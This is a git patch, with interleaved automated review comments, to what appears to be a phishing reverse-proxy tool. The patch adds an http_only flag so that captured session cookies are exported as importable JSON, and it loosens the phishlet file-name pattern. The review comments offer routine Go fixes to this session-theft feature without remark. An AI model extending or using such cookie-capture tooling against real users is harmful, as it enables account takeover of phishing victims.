From 2678d3c0f831547ce9034ef20fad4ac9437af3c2 Mon Sep 17 00:00:00 2001
From: Kuba Gretzky
Date: Sat, 8 Sep 2018 16:02:48 +0200
Subject: [PATCH] added optional http_only flag for cookies
---
 core/phishlet.go | 25 +++++++++++++++++++++----
 core/terminal.go | 14 ++++++++++++--
 main.go | 2 +-
 3 files changed, 34 insertions(+), 7 deletions(-)
diff --git a/core/phishlet.go b/core/phishlet.go
index 8fb4b79c3..c8077608c 100644
--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -34,6 +34,7 @@ type Phishlet struct {
 domains []string
 subfilters map[string][]SubFilter
 authTokens map[string][]string
+ httpTokens map[string][]string
 k_username string
 re_username string
 k_password string
@@ -61,8 +62,9 @@ type ConfigSubFilter struct {
 }
 type ConfigAuthToken struct {
- Domain string `mapstructure:"domain"`
- Keys []string `mapstructure:"keys"`
+ Domain string `mapstructure:"domain"`
+ Keys []string `mapstructure:"keys"`
+ HttpOnly []string `mapstructure:"http_only"`
 }
 type ConfigUserRegex struct {
@@ -106,6 +108,7 @@ func (p *Phishlet) Clear() {
 p.domains = []string{}
 p.subfilters = make(map[string][]SubFilter)
 p.authTokens = make(map[string][]string)
+ p.httpTokens = make(map[string][]string)
 p.k_username = ""
 p.re_username = ""
 p.k_password = ""
@@ -143,7 +146,7 @@ func (p *Phishlet) LoadFromFile(path string) error {
 p.addSubFilter(sf.Hostname, sf.Sub, sf.Domain, sf.Mimes, sf.Search, sf.Replace, sf.RedirectOnly)
 }
 for _, at := range fp.AuthTokens {
- p.addAuthTokens(at.Domain, at.Keys)
+ p.addAuthTokens(at.Domain, at.Keys, at.HttpOnly)
 }
 p.re_username = fp.UserRegex.Re
 p.k_username = fp.UserRegex.Key
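Review bot: The new `HttpOnly` field of `ConfigAuthToken` has no comment, and nothing in the struct says how `http_only` relates to `keys`. In this patch the list is read only by `isTokenHttpOnly` when `tokensToJSON` builds its output, so a name listed there presumably needs to appear under `keys` as well to have any effect; that should be confirmed and written down. A field comment such as `// HttpOnly names the cookies of Domain that are exported with "httpOnly": true.` would cover it. Under Go's initialism convention the field would be spelled `HTTPOnly`; the mapstructure tag can stay unchanged.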
@@ -235,8 +238,9 @@ func (p *Phishlet) addSubFilter(hostname string, subdomain string, domain string
 p.subfilters[hostname] = append(p.subfilters[hostname], SubFilter{subdomain: subdomain, domain: domain, mime: mime, regexp: regexp, replace: replace, redirect_only: redirect_only})
 }
-func (p *Phishlet) addAuthTokens(hostname string, tokens []string) {
+func (p *Phishlet) addAuthTokens(hostname string, tokens []string, http_tokens []string) {
 p.authTokens[hostname] = tokens
+ p.httpTokens[hostname] = http_tokens
 }
 func (p *Phishlet) getAuthTokens() []string {
@@ -274,6 +278,19 @@ func (p *Phishlet) domainExists(domain string) bool {
 return false
 }
+func (p *Phishlet) isTokenHttpOnly(domain string, token string) bool {
+ for d, tokens := range p.httpTokens {
+ if domain == d {
+ for _, tk := range tokens {
+ if tk == token {
+ return true
+ }
+ }
+ }
+ }
+ return false
+}
+
 func (p *Phishlet) MimeExists(mime string) bool {
 return false
 }
diff --git a/core/terminal.go b/core/terminal.go
index 67eec5fb8..5795253f8 100644
--- a/core/terminal.go
+++ b/core/terminal.go
@@ -237,6 +237,12 @@ func (t *Terminal) handleSessions(args []string) error {
 s_found := false
 for _, s := range sessions {
 if s.Id == id {
+ pl, err := t.cfg.GetPhishlet(s.Phishlet)
+ if err != nil {
+ log.Error("%v", err)
+ break
+ }
+
 s_found = true
 tcol := dgray.Sprintf("empty")
 if len(s.Tokens) > 0 {
@@ -248,7 +254,7 @@ func (t *Terminal) handleSessions(args []string) error {
 log.Printf("\n%s\n", AsRows(keys, vals))
 if len(s.Tokens) > 0 {
- json_tokens := t.tokensToJSON(s.Tokens)
+ json_tokens := t.tokensToJSON(pl, s.Tokens)
 t.output("%s", json_tokens)
 }
 break
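Review bot: `isTokenHttpOnly` ranges over every entry of `p.httpTokens` and compares each key with `domain`, which is a linear scan of a map that can simply be indexed. Indexing a missing key yields a nil slice, so the outer loop and the `if domain == d` test can be replaced by `for _, tk := range p.httpTokens[domain] {` with the inner comparison unchanged. The match is an exact string comparison, so the result depends on the caller passing `domain` spelled exactly as in the configuration entry; where the caller's domain keys come from is not visible in this hunk, so that expectation deserves a comment on the function.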
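Review bot: When `GetPhishlet` fails, the added `break` leaves the loop with `s_found` still false, so whatever the code after the loop does for an unknown id will also run for a lookup failure (that code lies outside the hunk). The two conditions should stay distinguishable: `handleSessions` already returns `error`, so `return err` in place of the `log.Error`/`break` pair reports the failure once and stops. `pl` is only used inside the `if len(s.Tokens) > 0` branch shown in the next hunk of this file, so the lookup could also move into that branch and leave the rest of the listing independent of it.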
@@ -468,13 +474,14 @@ func (t *Terminal) createHelp() {
 t.hlp = h
 }
-func (t *Terminal) tokensToJSON(tokens map[string]map[string]string) string {
+func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]string) string {
 type Cookie struct {
 Path string `json:"path"`
 Domain string `json:"domain"`
 ExpirationDate int64 `json:"expirationDate"`
 Value string `json:"value"`
 Name string `json:"name"`
+ HttpOnly bool `json:"httpOnly,omitempty"`
 }
 var cookies []*Cookie
@@ -487,6 +494,9 @@ func (t *Terminal) tokensToJSON(tokens map[string]map[string]string) string {
 Value: v,
 Name: k,
 }
+ if pl.isTokenHttpOnly(domain, k) {
+ c.HttpOnly = true
+ }
 cookies = append(cookies, c)
 }
 }
diff --git a/main.go b/main.go
index 7c8482743..74f6173cc 100644
--- a/main.go
+++ b/main.go
@@ -96,7 +96,7 @@ func main() {
 }
 for _, f := range files {
 if !f.IsDir() {
- pr := regexp.MustCompile(`([a-zA-Z0-9]*)\.yaml`)
+ pr := regexp.MustCompile(`([a-zA-Z0-9\-\.]*)\.yaml`)
 rpname := pr.FindStringSubmatch(f.Name())
 if rpname == nil || len(rpname) < 2 {
 continue
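Review bot: The three added lines in the second `tokensToJSON` hunk assign a boolean from a boolean; `HttpOnly: pl.isTokenHttpOnly(domain, k),` inside the `Cookie` literal just above says the same thing without the `if`. `pl` is used here without a nil check, which holds for the one caller in this patch because it checks the `GetPhishlet` error first, but the function itself does not say that `pl` must be non-nil. A one-line comment on `tokensToJSON` stating that requirement would help. The literal and the loop around it begin outside this hunk.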
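Review bot: The pattern on the changed line in `main.go` is unanchored, so `FindStringSubmatch` accepts any file name that merely contains a match: with `.` now in the character class, `a.yaml.bak` yields the name `a` and `a.b.yaml.orig` yields `a.b`. Anchoring it as `^([a-zA-Z0-9\-\.]*)\.yaml$` limits loading to files that really end in `.yaml`, and `+` instead of `*` would also reject a bare `.yaml`. `regexp.MustCompile` runs on every iteration of the `for _, f := range files` loop and can be hoisted above it. What happens to the captured name afterwards is outside the hunk, so whether dots and dashes are acceptable everywhere that name is used should be checked.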